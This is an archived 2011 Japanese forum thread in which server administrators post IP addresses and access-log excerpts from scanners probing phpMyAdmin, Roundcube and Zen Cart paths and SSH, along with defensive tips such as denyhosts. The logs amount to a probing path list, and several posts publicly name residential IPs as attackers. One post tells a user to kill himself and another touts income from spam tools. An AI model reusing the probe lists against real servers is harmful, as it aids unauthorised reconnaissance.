アタックNo1してきたIPを晒すスレ

このエントリーをはてなブックマークに追加
1DNS未登録さん
涙が出ちゃう
2DNS未登録さん:2011/02/01(火) 23:50:11 ID:???
212.83.42.101 WEBの常連さん。
MyAdmin myadmin mysql phpMyAdmin phpmyadmin pma webdav geeklog/bbs/fckeditor/editor
その他色々なフォルダを探して手当たりしだいアクセス、sshのログインも一生懸命してくる
3DNS未登録さん:2011/02/01(火) 23:57:35 ID:???
>>2
IP毎回違うけど、うちにもphpMyAdminとかpmaとか探しに何回も来てるよ
4DNS未登録さん:2011/02/02(水) 02:07:47 ID:???
phpMyAdminは多いいね。 それ以外はロボットばっかり
5DNS未登録さん:2011/02/02(水) 10:52:51 ID:???
Feb 1 20:53:36 192 sshd[30181]: refused connect from ::ffff:221.206.130.3 (::ffff:221.206.130.3)
Feb 1 21:50:22 192 sshd[30308]: refused connect from ::ffff:221.206.130.3 (::ffff:221.206.130.3)
Feb 1 23:10:01 192 sshd[30585]: refused connect from ::ffff:61.163.56.24 (::ffff:61.163.56.24)
Feb 1 23:50:12 192 sshd[30654]: refused connect from ::ffff:61.163.56.24 (::ffff:61.163.56.24)
Feb 2 00:20:23 192 sshd[30768]: refused connect from ::ffff:60.12.11.62 (::ffff:60.12.11.62)
Feb 2 01:54:23 192 sshd[30957]: refused connect from ::ffff:128.226.170.170 (::ffff:128.226.170.170)
Feb 2 04:37:54 192 sshd[31317]: refused connect from ::ffff:202.205.176.115 (::ffff:202.205.176.115)

SSHのポートを22から変えたら全く来なくなったけど、試しに22に戻したらまた来た。
22が開いてるところしか狙ってないのかな。
6DNS未登録さん:2011/02/02(水) 21:48:05 ID:???
うちもphpMyAdmin関係は多い
# cat /var/log/httpd/access_log | grep 110.172.52.5 | wc -l
951
7DNS未登録さん:2011/02/03(木) 21:04:44 ID:???
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:00 +0900] "GET /php-my-admin/scripts/setup.php HTTP/1.1" 404 228
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:00 +0900] "GET /phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:00 +0900] "GET /phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:01 +0900] "GET /phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:01 +0900] "GET /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:02 +0900] "GET /phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:02 +0900] "GET /phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:02 +0900] "GET /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:03 +0900] "GET /phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:03 +0900] "GET /phpMyAdmin-2.5.6-rc1/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:03 +0900] "GET /phpMyAdmin-2.5.6-rc2/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:04 +0900] "GET /phpMyAdmin-2.5.6/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:04 +0900] "GET /phpMyAdmin-2.5.7/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:05 +0900] "GET /phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:05 +0900] "GET /phpMyAdmin-2.6.0-alpha/scripts/setup.php HTTP/1.1" 404 238
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:05 +0900] "GET /phpMyAdmin-2.6.0-alpha2/scripts/setup.php HTTP/1.1" 404 239
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:06 +0900] "GET /phpMyAdmin-2.6.0-beta1/scripts/setup.php HTTP/1.1" 404 238
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:06 +0900] "GET /phpMyAdmin-2.6.0-beta2/scripts/setup.php HTTP/1.1" 404 238
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:06 +0900] "GET /phpMyAdmin-2.6.0-rc1/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:07 +0900] "GET /phpMyAdmin-2.6.0-rc2/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:07 +0900] "GET /phpMyAdmin-2.6.0-rc3/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:08 +0900] "GET /phpMyAdmin-2.6.0/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:08 +0900] "GET /phpMyAdmin-2.6.0-pl1/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:08 +0900] "GET /phpMyAdmin-2.6.0-pl2/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:09 +0900] "GET /phpMyAdmin-2.6.0-pl3/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:22 +0900] "GET /phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.1" 404 232
こういう奴か
8DNS未登録さん:2011/02/04(金) 00:56:26 ID:2KVB2Qqc
こいつ アタックNO1w
FNAfb-09p2-253.ppp11.odn.ad.jp
9DNS未登録さん:2011/02/05(土) 08:50:59 ID:???
91.121.243.113
>7と同じ。phpMyAdmin関係総なめ
10DNS未登録さん:2011/02/05(土) 12:20:03 ID:???
>2
sshdは、denyhostお勧め。
アタックしてきたアドレスを、自動でブロックしてくれる。
我が家の現状:
% egrep ^sshd /etc/hosts.deny | wc -l
1100

11DNS未登録さん:2011/02/06(日) 00:18:30 ID:???
apacheってリクエストがないとログ記録されないっけ
12DNS未登録さん:2011/02/06(日) 13:43:36 ID:???
            ,, -――-、         |    アタックチャンス !!
            //ヾソ)),il|,);r、.    人
          /";彡`ヾド!ソツノ゙ミヾ、      ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
           i;彡   _ _   ミ. i
         ,i;;;彡 ,.,._ .  :_..、ヾ/
         i:yv. ´;.。.、`; ;。:、 リ
         ヽ`i  、 _;ノ,: i、:_,. !
         `| ,__、,.r、_.bヽ. ,′
        /r´.三ミD‐-;→;ソ
    , : -´ ̄|::::|´^, r〕!Ξ´.ノ‐- 、.
  /::::::::::::::::ヽノ   )´、:_丿|::\:::::::`‐-、.
./ :::::::\_:::::::∧ , _.∧ ./.ヽ !:::::::ヽ:::::::::|:`,
13DNS未登録さん:2011/02/06(日) 23:50:48 ID:???
googleのbotしかこねー
14DNS未登録さん:2011/02/07(月) 14:39:46 ID:???
61.19.255.14 - - [07/Feb/2011:03:59:46 +0900] "GET /roundcubemail/README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
61.19.255.14 - - [07/Feb/2011:03:59:46 +0900] "GET /rc/README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
61.19.255.14 - - [07/Feb/2011:03:59:46 +0900] "GET /webmail/README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
61.19.255.14 - - [07/Feb/2011:03:59:47 +0900] "GET /roundcube/README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
61.19.255.14 - - [07/Feb/2011:03:59:47 +0900] "GET /mail/README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
61.19.255.14 - - [07/Feb/2011:03:59:47 +0900] "GET /README HTTP/1.1" 404 444 "-" "Morfeus strikes again."

phpMyAdmin以外に、こんな奴も最近来るようになった
15DNS未登録さん:2011/02/08(火) 00:04:26 ID:???
これは何がしたいんだ
16DNS未登録さん:2011/02/08(火) 01:00:58 ID:???
http://www.ipa.go.jp/security/fy21/reports/tech1-tg/a_07.html
Roundcube
17DNS未登録さん:2011/02/09(水) 21:25:17 ID:???
これは何がしたいんだ
18DNS未登録さん:2011/02/09(水) 21:54:37 ID:???
単純にroundcubeを置いてるかどうか探してるんでしょ
roundcube使ったことないから知らないけど、phpMyAdminみたいにセキュリティホールあるんじゃないの?
19DNS未登録さん:2011/02/11(金) 10:39:12 ID:MrqsjyYh
先月はこんな感じ。去年に比べてだいぶ減ったなぁ。
http://uproda.2ch-library.com/3421976IH/lib342197.jpg
20DNS未登録さん:2011/02/11(金) 20:18:49 ID:???
>>14と全く同じのが来てた
日時もほぼ同じ

あとこんなのとか

67.205.111.77 (5rreo.com)
Date,Time,Method,URL,Query,HTTP,Status,Size,Referer,Keyword,Agent
2011/02/04,03:15:23,GET,"/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:24,GET,"/cart/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:25,GET,"/zen-cart/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:25,GET,"/zencart/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:26,GET,"/zen/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:27,GET,"/butik/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:27,GET,"/shop/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:28,GET,"/butik/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:28,GET,"/zcart/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:29,GET,"/catalog/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:29,GET,"/shop2/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:30,GET,"/boutique/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:31,GET,"/store/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
21DNS未登録さん:2011/02/12(土) 20:43:40 ID:???
http://members3.jcom.home.ne.jp/rising-sun/
こちらにURLを掲載されてから、スパマーが大挙して書き込みに来るようになりました。
それまで5hot/月くらいだったので、どうやって俺のサイトを見つけたのか不思議です。
22DNS未登録さん:2011/02/12(土) 21:16:37 ID:???
馬鹿サイトサーチャーに引っかかったんじゃねw あほかと
23DNS未登録さん:2011/02/12(土) 21:40:10 ID:???
>>21
馬鹿だろ?

自殺しなさい
24DNS未登録さん:2011/02/13(日) 15:25:06 ID:???
5分から数時間周期で、うちの掲示板を爆撃してくれてるIPの方々

125-14-198-192.rev.home.ne.jp
155.215.232.111.ap.yournet.ne.jp
173.60.112.219.ap.yournet.ne.jp
182-167-50-41f1.kyt1.eonet.ne.jp
36.76.44.61.ap.yournet.ne.jp
55.223.183.58.megaegg.ne.jp
fa211-113.infoaomori.ne.jp
fe219-224.infoaomori.ne.jp
gd202157012064.u31.kcn-tv.ne.jp
i121-115-10-40.s05.a002.ap.plala.or.jp
i60-34-249-28.s05.a002.ap.plala.or.jp
kd111098033213.ppp-bb.dion.ne.jp
nttkyo787161.tkyo.nt.ftth.ppp.infoweb.ne.jp
p1208-ipbf11matuyama.ehime.ocn.ne.jp
p2176-ipbf31osakakita.osaka.ocn.ne.jp
p2220-ipbf217hodogaya.kanagawa.ocn.ne.jp
p4001-ipbf506okidate.aomori.ocn.ne.jp
p4043-ipbfp505oomichi.oita.ocn.ne.jp
p6107-ipad24osakakita.osaka.ocn.ne.jp
fe219-224.infoaomori.ne.jp
gd202157012064.u31.kcn-tv.ne.jp
i121-115-10-40.s05.a002.ap.plala.or.jp
i60-34-249-28.s05.a002.ap.plala.or.jp
kd111098033213.ppp-bb.dion.ne.jp
nttkyo787161.tkyo.nt.ftth.ppp.infoweb.ne.jp
p1208-ipbf11matuyama.ehime.ocn.ne.jp
p2176-ipbf31osakakita.osaka.ocn.ne.jp
p2220-ipbf217hodogaya.kanagawa.ocn.ne.jp
p4001-ipbf506okidate.aomori.ocn.ne.jp
p4043-ipbfp505oomichi.oita.ocn.ne.jp
p6107-ipad24osakakita.osaka.ocn.ne.jp
pd9c147.aicint01.ap.so-net.ne.jp
softbank126028210215.bbtec.net
z130201.dynamic.ppp.asahi-net.or.jp
25DNS未登録さん:2011/02/13(日) 21:37:57 ID:???
今日のエロPOST
110.4.130.201 111.232.215.155
112.136.113.83 113.146.93.230
113.197.189.143 114.168.207.139
114.170.128.214 114.184.9.220
118.104.172.220 118.104.179.201
118.109.143.39 118.8.38.149
118.9.220.244 119.106.141.196
119.171.129.173 119.240.104.41
121.110.118.125 121.112.239.228
121.84.232.185 121.87.9.57
121.94.255.149 122.132.10.123
122.135.162.147 123.220.39.220
124.147.111.65 124.214.165.15
124.24.204.121 124.96.171.120
124.96.52.43 125.14.198.192
125.204.241.189 125.207.20.146
126.127.166.209 126.131.28.248
126.14.122.149 150.70.75.161
180.131.90.82
180.144.58.187
180.221.227.142
180.5.197.245
182.167.80.18
182.168.195.197
183.76.79.10
202.157.12.64
202.226.208.164
202.226.214.49
211.2.66.140
216.104.15.130
216.104.15.134
216.104.15.138
216.104.15.142
218.231.172.112
219.111.124.66
219.112.60.122
219.8.100.11
220.56.10.183
221.190.78.15
221.20.34.163
222.144.50.1
222.226.145.26
58.0.105.152
58.169.234.43
58.183.5.68
58.188.233.9
60.237.4.90
60.239.223.164
60.39.34.90
61.210.188.161
61.44.54.37
61.46.27.183
61.89.161.187
61.89.165.136
26DNS未登録さん:2011/02/13(日) 22:12:34 ID:???
上の奴へ
ポスト系は、IP変えながら投げるツールが腐るほどあるから
いくら晒しても無駄だと思われ。
ツール使えば月50万くらいは稼げるぞw
27DNS未登録さん:2011/02/13(日) 22:20:48 ID:???
MA
NU
KE
HA
SI
N
DE
KU
RE
28DNS未登録さん:2011/02/13(日) 22:33:58 ID:???
>>26
IP変えてくる奴もいるけど、
223.132.1.24は、9千回以上ログに出てくる
29DNS未登録さん:2011/02/20(日) 18:16:55.27 ID:???
220.105.173.3
30DNS未登録さん:2011/02/20(日) 19:15:52.01 ID:???
p840118.tokynt01.ap.so-net.ne.jp
31DNS未登録さん:2011/02/21(月) 21:33:37.73 ID:???
苦しくたって 悲しくたって jailの中なら平気なの?

…スマソ
32DNS未登録さん:2011/02/22(火) 21:54:34.06 ID:???
91.121.108.5 [22/Feb/2011:01:49:51 +0900] "GET /scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:49:51 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
91.121.108.5 [22/Feb/2011:01:49:52 +0900] "GET /db/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:49:57 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:50:03 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:50:09 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:50:15 +0900] "GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:50:21 +0900] "GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:50:27 +0900] "GET /web/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:30 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
89.149.242.190 [22/Feb/2011:02:44:31 +0900] "GET /PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:31 +0900] "GET /3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:37 +0900] "GET /PMA/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:43 +0900] "GET /PMA2005/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:52 +0900] "GET /SSLMySQLAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:58 +0900] "GET /admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:04 +0900] "GET /admin/pma/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:10 +0900] "GET /admin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:16 +0900] "GET /bbs/data/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:22 +0900] "GET /cpadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:28 +0900] "GET /cpadmindb/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:34 +0900] "GET /cpanelmysql/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:40 +0900] "GET /cpanelphpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:46 +0900] "GET /cpanelsql/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:52 +0900] "GET /cpdbadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:58 +0900] "GET /cpphpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:04 +0900] "GET /db/scripts/setup.php HTTP/1.1" 404 REF:-
33DNS未登録さん:2011/02/22(火) 21:56:13.08 ID:9vW0beJU
89.149.242.190 [22/Feb/2011:02:46:10 +0900] "GET /dbadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:16 +0900] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:22 +0900] "GET /mysql-admin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:28 +0900] "GET /mysql/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:34 +0900] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:35 +0900] "GET /mysqlmanager/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:41 +0900] "GET /p/m/a/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:35 +0900] "GET /mysqladminconfig/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:47 +0900] "GET /pMA/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:53 +0900] "GET /php-my-admin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:59 +0900] "GET /php-myadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:05 +0900] "GET /phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:11 +0900] "GET /phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:17 +0900] "GET /phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:23 +0900] "GET /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:29 +0900] "GET /phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:35 +0900] "GET /phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:41 +0900] "GET /phpMyAdmin-2.5.5-rc1config/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:47 +0900] "GET /phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:53 +0900] "GET /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:59 +0900] "GET /phpMyAdmin-2.5.6-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:05 +0900] "GET /phpMyAdmin-2.5.6-rc2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:11 +0900] "GET /phpMyAdmin-2.5.6/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:17 +0900] "GET /phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:23 +0900] "GET /phpMyAdmin-2.5.7/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:29 +0900] "GET /phpMyAdmin-2.6.0-alpha/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:35 +0900] "GET /phpMyAdmin-2.6.0-alpha2/scripts/setup.php HTTP/1.1" 404 REF:-
34DNS未登録さん:2011/02/22(火) 21:57:03.09 ID:???
89.149.242.190 [22/Feb/2011:02:48:39 +0900] "GET /phpMyAdmin-2.6.0-beta2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:38 +0900] "GET /phpMyAdmin-2.6.0-beta1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:45 +0900] "GET /phpMyAdmin-2.6.0-pl1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:51 +0900] "GET /phpMyAdmin-2.6.0-pl2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:57 +0900] "GET /phpMyAdmin-2.6.0-pl3/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:03 +0900] "GET /phpMyAdmin-2.6.0-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:09 +0900] "GET /phpMyAdmin-2.6.0-rc2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:15 +0900] "GET /phpMyAdmin-2.6.0-rc3/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:21 +0900] "GET /phpMyAdmin-2.6.0/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:27 +0900] "GET /phpMyAdmin-2.6.1-pl1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:33 +0900] "GET /phpMyAdmin-2.6.1-pl2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:39 +0900] "GET /phpMyAdmin-2.6.1-pl3/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:45 +0900] "GET /phpMyAdmin-2.6.1-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:51 +0900] "GET /phpMyAdmin-2.6.1-rc2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:57 +0900] "GET /phpMyAdmin-2.6.1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:03 +0900] "GET /phpMyAdmin-2.6.2-beta1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:09 +0900] "GET /phpMyAdmin-2.6.2-pl1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:15 +0900] "GET /phpMyAdmin-2.6.2-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:21 +0900] "GET /phpMyAdmin-2.6.2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:27 +0900] "GET /phpMyAdmin-2.6.3-pl1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:33 +0900] "GET /phpMyAdmin-2.6.3-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:39 +0900] "GET /phpMyAdmin-2.6.3/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:43 +0900] "GET /phpMyAdmin-2.6.4-pl2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:42 +0900] "GET /phpMyAdmin-2.6.4-pl1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:49 +0900] "GET /phpMyAdmin-2.6.4-pl3/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:55 +0900] "GET /phpMyAdmin-2.6.4-pl4/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:01 +0900] "GET /phpMyAdmin-2.6.4-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:07 +0900] "GET /phpMyAdmin-2.6.4/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:13 +0900] "GET /phpMyAdmin-2.7.0-beta1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:19 +0900] "GET /phpMyAdmin-2.7.0-pl1/scripts/setup.php HTTP/1.1" 404 REF:-
35DNS未登録さん:2011/02/22(火) 21:57:43.50 ID:???
89.149.242.190 [22/Feb/2011:02:51:25 +0900] "GET /phpMyAdmin-2.7.0-pl2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:31 +0900] "GET /phpMyAdmin-2.7.0-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:37 +0900] "GET /phpMyAdmin-2.7.0/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:43 +0900] "GET /phpMyAdmin-2.8.0-beta1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:49 +0900] "GET /phpMyAdmin-2.8.0-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:55 +0900] "GET /phpMyAdmin-2.8.0-rc2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:01 +0900] "GET /phpMyAdmin-2.8.0.1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:07 +0900] "GET /phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:13 +0900] "GET /phpMyAdmin-2.8.0.3/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:19 +0900] "GET /phpMyAdmin-2.8.0.4/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:25 +0900] "GET /phpMyAdmin-2.8.0/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:31 +0900] "GET /phpMyAdmin-2.8.1-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:37 +0900] "GET /phpMyAdmin-2.8.1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:43 +0900] "GET /phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:46 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:46 +0900] "GET /phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:52 +0900] "GET /phpMyAdmin2/scripts/setup.php HTTP/1.1" 404 REF:-
